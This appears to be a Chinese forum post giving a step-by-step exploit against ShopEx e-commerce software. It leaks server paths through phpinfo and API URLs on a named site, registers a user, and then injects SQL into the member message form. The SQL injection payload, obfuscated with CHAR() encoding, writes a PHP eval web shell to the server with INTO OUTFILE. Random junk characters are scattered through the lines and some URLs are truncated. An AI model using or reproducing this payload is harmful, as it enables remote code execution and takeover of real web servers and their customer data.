shopex前台普通用户getshell最新漏洞

admin

第一个：想办法找到目标网站的绝对路径

+ d  N9 L% t. ]5 D9 F( z. @) {  U) Ohttp://www.political-security.com/install/svinfo.php?phpinfo=true
: L$ N+ H  g+ p
) ^7 E  X6 J0 k$ `http:/www.political-security.com/core/api/shop_api.php
2 ^3 v0 |  j0 w+ J) h, v: e# b
/ E/ Y2 j0 c. V# O  w4 u& _; _http://www.political-security.co ... api_b2b_2_0_cat.php
- T7 o( ~8 r% O4 v
http://www.political-security.com/core/ap ... b_2_0_goodstype.php

2 y4 h" K/ q7 j9 [% r$ ?; E- Vhttp://www.political-security.co ... i_b2b_2_0_brand.php
/ N& \; z1 c* E! M4 r第二个：注册一个普通用户

http://www.political-security.com/?passport-signup.html

第三个： 发送消息

http://www.political-security.com/?member-send.html
9 X: E; x$ m6 i: W) l4 S% Y发送给中填写
antian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #